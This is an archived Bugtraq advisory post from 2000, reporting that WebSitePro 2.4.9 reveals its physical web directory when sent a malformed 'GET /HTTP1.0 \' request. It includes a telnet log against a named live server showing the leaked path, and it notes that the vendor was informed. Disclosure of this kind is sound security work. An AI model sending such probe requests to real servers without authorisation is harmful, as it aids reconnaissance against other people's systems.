[13345] in bugtraq
Re: WebSitePro/2.3.18 + 2.4.9 is revealing Webdirectories
daemon@ATHENA.MIT.EDU (Lark Lizerman)
Fri Jan 14 21:50:37 2000
Mime-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_NextPart_000_00E7_01BF5E14.DAB4C4A0"
Message-Id: <00f001bf5e58$112c1d60$beffcd98@u1u7p1>
Date: Thu, 13 Jan 2000 22:23:45 -0800
Reply-To: Lark Lizerman <webmaster@DOC2000.DE>
From: Lark Lizerman <webmaster@DOC2000.DE>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
This is a multi-part message in MIME format.
------=_NextPart_000_00E7_01BF5E14.DAB4C4A0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
I got a tip from Noah Rathaus about WebSite Pro latest version(2.4.9). =
He mentioned a server
where WebSite Pro. 2.4.9 is run.
I discovered, that also the latest version is vulnerable to the bug of =
revealing webdirectories.
In the new version there must be made a change to retrieve the =
directoryname.
When you connect to a server send the command line:
GET /HTTP1.0 \
You have now to add a space before the last backspace of the =
commandline.
That makes the server respond with a "404" error and and prints the =
directoryname.
Here is the part from the logfile of Windows Telnet Client:
website.oreilly.com:
----------------------------------------------------start----------------=
---------------------------------------
GET /HTTP1.0 \
=20
HTTP/1.0 404 Not Found
Date: Thu, 13 Jan 2000 20:47:12 GMT
Server: WebSitePro/2.4.9
Accept-ranges: bytes
Content-type: text/html
Content-length: 216
=20
<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD>
<BODY =
bgcolor=3D"White"><H2>404 Not
Found</H2>
The requested URL was not found on this =
server:<P><CODE>/HTTP1.0<P>(c
:\1Web\docs\website\HTTP1.0)</CODE><P>
</BODY></HTML>
--------------------------------------------------end--------------------=
------------------------------------
Here it shows us the directory "c:\1Web\docs\website\".
Status: Vendor contacted and informed about the bug.
Expecting statement about fix.
-------------------------------
Lark Lizerman
Contact:
Lark82@hotmail.com
or
webmaster@doc2000.de
-------------------------------
------=_NextPart_000_00E7_01BF5E14.DAB4C4A0
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content=3D"text/html; charset=3Diso-8859-1" =
http-equiv=3DContent-Type>
<META content=3D"MSHTML 5.00.2722.2800" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#fffff0>
<DIV><FONT face=3DArial size=3D2>I got a tip from Noah Rathaus about =
WebSite Pro=20
latest version(2.4.9). He mentioned a server</FONT></DIV>
<DIV><FONT face=3DArial size=3D2>where WebSite Pro. 2.4.9 is =
run.</FONT></DIV>
<DIV><FONT face=3DArial size=3D2>I discovered, that also the latest =
version is=20
vulnerable to the bug of revealing webdirectories.</FONT></DIV>
<DIV><FONT face=3DArial size=3D2>In the new version there must be made a =
change to=20
retrieve the directoryname.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>When you connect to a server send the =
command=20
line:</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>GET /HTTP1.0 \</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>You have now to add a space before the =
last=20
backspace of the commandline.</FONT></DIV>
<DIV><FONT face=3DArial size=3D2>That makes the server respond with a =
"404" error=20
and and prints the directoryname.</FONT></DIV>
<DIV> </DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Here is the part from the logfile of =
Windows Telnet=20
Client:</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2>website.oreilly.com:</FONT></DIV>
<DIV><FONT face=3DArial=20
size=3D2>----------------------------------------------------start-------=
------------------------------------------------</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2>GET /HTTP1.0 \<BR> <BR>HTTP/1.0 =
404 Not=20
Found<BR>Date: Thu, 13 Jan 2000 20:47:12 GMT<BR>Server:=20
WebSitePro/2.4.9<BR>Accept-ranges: bytes<BR>Content-type:=20
text/html<BR>Content-length:=20
216<BR> <BR><HTML><HEAD><TITLE>404 Not=20
Found</TITLE></HEAD><BR> &=
nbsp; &n=
bsp; &nb=
sp; &nbs=
p; =20
<BODY bgcolor=3D"White"><H2>404=20
Not<BR> Found</H2><BR> &nbs=
p; =20
The requested URL was not found on this=20
server:<P><CODE>/HTTP1.0<P>(c<BR>:\1Web\docs\website\HT=
TP1.0)</CODE><P><BR>  =
; =
&=
nbsp; =20
</BODY></HTML><BR>-------------------------------------------=
-------end--------------------------------------------------------</FONT>=
</DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2>Here it shows us the directory=20
"c:\1Web\docs\website\".</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2>Status: Vendor contacted and informed =
about the=20
bug.</FONT></DIV>
<DIV><FONT face=3DArial size=3D2>Expecting statement about =
fix.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>-------------------------------<BR>Lark =
Lizerman</FONT></DIV>
<DIV><FONT face=3DArial size=3D2>Contact:</FONT></DIV>
<DIV><FONT face=3DArial size=3D2><A=20
href=3D"mailto:Lark82@hotmail.com">Lark82@hotmail.com</A></FONT></DIV>
<DIV><FONT face=3DArial size=3D2>or<BR><A=20
href=3D"mailto:webmaster@doc2000.de">webmaster@doc2000.de</A><BR>--------=
-----------------------</FONT></DIV></BODY></HTML>
------=_NextPart_000_00E7_01BF5E14.DAB4C4A0--
